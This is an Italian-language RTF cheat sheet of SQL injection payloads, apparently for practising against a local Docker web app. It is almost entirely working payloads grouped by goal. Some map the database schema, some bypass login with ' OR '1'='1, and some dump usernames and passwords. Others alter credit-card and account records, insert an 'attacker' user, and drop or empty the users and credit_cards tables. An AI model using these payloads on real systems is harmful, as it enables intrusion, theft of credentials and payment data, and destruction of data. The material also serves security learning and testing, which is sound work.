{\rtf1\ansi\ansicpg1252\cocoartf2822
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica-Bold;\f1\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;\red127\green127\blue127;}
{\*\expandedcolortbl;;\cssrgb\c57046\c57047\c57046;}
\paperw11900\paperh16840\margl1440\margr1440\vieww11420\viewh8400\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f0\b\fs24 \cf0 Informazioni sul dataset:\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f1\b0 \cf0 ' ; SHOW TABLES; -- \
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\pardirnatural\partightenfactor0
\cf0 ' ; DESCRIBE users; -- / ' ; SHOW COLUMNS FROM users; -- \
' ; SHOW TABLE STATUS; -- \
' ; SHOW COLUMNS FROM credit_cards; -- \
alice'; UPDATE credit_cards SET cvv='999' WHERE userId=1; -- \cf2 (per testare i nomi dei campi)\cf0 \
' ; SELECT database(); -- \
' ; SELECT version(); -- \
' ; SELECT user(); -- \
alice' ORDER BY 5; --  \cf2 #permette di capire quante colonne sono prese dalla query, con 5 errore, con meno di 5 ordina le righe\cf0 \
\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f0\b \cf0 Esfiltrazione dati:\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f1\b0 \cf0 alice' -- \
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\pardirnatural\partightenfactor0
\cf0 ' OR '1'='1 (nel campo password)\
' OR 'a'='a (nel campo password)\
' ; SELECT username FROM users; -- \
' ; SELECT * FROM users; -- \
' ; SELECT password FROM users WHERE '1'='1'; -- \
\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f0\b \cf0 Modifica o Inserimento:\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f1\b0 \cf0 alice'; UPDATE credit_cards SET cvv='999' WHERE user_id=1; -- \
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\pardirnatural\partightenfactor0
\cf0 alice'; UPDATE credit_cards SET circuit='hacked' WHERE user_id=1; -- \
alice'; UPDATE users SET username='attacker' WHERE id=1; -- \
attacker'; UPDATE users SET password='hacked' WHERE username='attacker'; -- \
attacker' ; INSERT INTO users (username, password) VALUES ('attacker2', '1234'); -- \
\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f0\b \cf0 Cancellazione di tabelle:\
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\sl360\slmult1\pardirnatural\partightenfactor0

\f1\b0 \cf0 '; DROP TABLE credit_cards; -- \
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5289\tx5760\tx6480\tx7200\tx7595\tx8640\pardirnatural\partightenfactor0
\cf0 '; DROP TABLE users; -- \
'; DELETE FROM users WHERE 'a'='a'; -- \
\

\f0\b Utili:
\f1\b0 \
sito http://localhost:8080\
\
docker compose down -v\
docker compose up --build\
\
\
\
\
}